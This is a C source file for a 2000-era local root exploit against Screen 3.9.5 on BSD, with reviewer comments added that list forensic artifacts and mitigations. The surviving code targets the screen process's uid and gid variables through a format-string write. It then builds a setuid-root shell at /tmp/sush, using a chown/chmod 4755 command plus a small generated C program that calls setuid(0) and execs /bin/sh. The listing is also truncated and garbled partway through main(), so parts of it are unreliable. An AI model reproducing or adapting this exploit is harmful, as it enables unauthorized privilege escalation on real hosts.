/****************************************************************
 *                                                              *
 *   Screen 3.9.5 BSD local exploit                             *
 *   by IhaQueR at IRCNET                                       *
 *   !only for demonstrative purposes!                          *
 *                                                              *
 ****************************************************************/

/*
 * NOTE(review): this listing is incomplete as archived. Everything that sat
 * between angle brackets was lost in extraction: the header names after each
 * #include, the argument names in the usage string, and most of the body of
 * main() between the "create env" loop and the tail of a later format string.
 * It does not compile as shown. The comments below describe only what the
 * surviving text demonstrates.
 *
 * Artifacts named in the visible text, useful when triaging a host:
 *   /tmp/.home   (the `home` string below)
 *   /tmp/sush.c  and  /tmp/sush  (a helper the tail of main() builds, with a
 *                command string that sets owner root and mode 4755 on it)
 * The listing targets the binary at /usr/local/bin/screen-3.9.5 and the
 * uid/gid variables inside it, so it presumably depends on that binary being
 * installed with elevated privileges -- confirm against the host. Moving off
 * the affected release, dropping the setuid bit where it is not needed, and
 * mounting /tmp nosuid are the controls that apply.
 */

/* Header names were stripped in extraction; ten bare directives remain. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

extern char **environ;

/* Directory string under /tmp; its use is in the part of main() that was lost. */
char* home = "/tmp/.home";
/* A PS1 environment entry; its use is in the part of main() that was lost. */
char* ev1 = "PS1=\\u@ExploitMe>";

/* Absolute path of the target binary passed to execve() at the end of main(). */
#define SCREEN "/usr/local/bin/screen-3.9.5"
/* Shell path substituted into the generated /tmp/sush.c source. */
#define SHELL "/bin/sh"
/* rc file names; the code that uses them is not visible in the surviving text. */
#define SCREENRC ".screenrc"
#define BASHRC ".bashrc"

/* offset to the env seen from Msg() */
#define BUFOFFSET 2682

/* addr to be written (may vary)*/
/* NOTE(review): equals the &real_uid value in the author's table below. */
#define WRITEADDR 0x3c1e4

/*
        some addresses grabbed from 3.9.5 OpenBSD:

        &real_uid, &real_gid, &eff_uid, &eff_gid
        0x3c1e4    0x3c224    0x3b1b0   0x3b1a4

        for finding addresses see expl.c, it may be hard...
*/
/*
 * NOTE(review): the targets are the credential variables of the screen
 * process. This looks consistent with the publicly documented format-string
 * flaw in Screen's message handling, but the input that reaches Msg() is not
 * visible in this listing -- treat that as an inference.
 */

/* repeat the addr table in environ */
#define ENVREP 32

/* but write only once */
#define WREP 1

/* Environment vector handed to execve(); it is populated in the lost section. */
char* env[ENVREP*4 + 256];

/* Size of every scratch buffer declared in main(). */
#define TMPBUFSIZE (BUFOFFSET+1024)

/*
 * Entry point. Requires exactly four command-line values (argc == 5), which
 * are parsed with atoi() into writeoffs, bfoff, byteadj and padding; atoi()
 * reports no errors, so non-numeric input silently becomes 0.
 * Returns 0 after printing the usage line when the argument count is wrong;
 * otherwise the visible control flow ends in execve(), and nothing is
 * returned if that call fails.
 */
int main(int argc, char** argv)
{
        /*
         * Most of these locals (off, bufoffset, ep, b, ob, vv, pp, fp, myhome,
         * screenrc, pad, buf2) are never referenced in the surviving text;
         * their uses were presumably in the section lost to extraction.
         */
        int i, off=0;
        int writeoffs=0, bufoffset=0, padding=0, bfoff=0, byteadj=0;
        int ep=0, b=0, ob=0;
        unsigned vv[ENVREP+2];
        unsigned char* pp;
        FILE* fp;
        char buf[TMPBUFSIZE];
        unsigned char myhome[TMPBUFSIZE];
        char screenrc[TMPBUFSIZE];
        char bashrc[TMPBUFSIZE];
        char pad[TMPBUFSIZE];
        char buf2[TMPBUFSIZE];

        if(argc != 5) {
                /* The argument names after %s were stripped in extraction. */
                printf("USAGE %s \n", argv[0]);
                return 0;
        } else {
                printf("Screen 3.9.5 local r00t exploit\n");
                printf("by IhaQueR@IRCNET\n\n");
        }

        /* user supplied offsets */
        writeoffs = atoi(argv[1]);
        bfoff = atoi(argv[2]);
        byteadj = atoi(argv[3]);
        padding = atoi(argv[4]);

        /* create env */
        /*
         * NOTE(review): the rest of the function is kept verbatim and
         * unformatted, because the text is damaged from this point on. The loop
         * header is cut off after "i", and the next surviving text is the tail
         * of a format string whose start is gone; quotes are therefore
         * unbalanced. What the surviving statements show, in order:
         *   - a string containing "chown root /tmp/sush; chmod 4755 /tmp/sush"
         *     is formatted with `bashrc` as an argument and the result in `buf`
         *     is run through system(); the destination of that text is not
         *     visible (presumably an rc file -- unconfirmed);
         *   - a C source file is written to /tmp/sush.c with echo, then built
         *     with gcc into /tmp/sush; the generated program calls setuid(0),
         *     setgid(0) and execv() on SHELL;
         *   - argv[1] is set to NULL so the target receives no arguments, the
         *     user is prompted, and execve(SCREEN, argv, env) replaces the
         *     process.
         * None of the system() or execve() results are checked.
         * A root-owned mode-4755 file under /tmp is the persistent trace this
         * leaves; file-integrity or setuid-inventory scans would surface it.
         */
        for(i=0; i%s 'chown root /tmp/sush; chmod 4755 /tmp/sush'", bashrc); system(buf); /* create suid shell */ printf("compiling suid shell\n"); snprintf(buf, TMPBUFSIZE, "echo >/tmp/sush.c 'main(int ac, char**av){setuid(0); setgid(0); execv(\"%s\", av);}'", SHELL); system(buf); system("gcc /tmp/sush.c -o /tmp/sush"); /* set env and call screen */ argv[1] = NULL; printf("press 
enter to start screen, then hit enter again, ctrl-g, ctrl-c for suid shell at /tmp/sush and root uid"); getchar(); execve(SCREEN, argv, env); } /* www.hack.co.za [8 September 2000]*/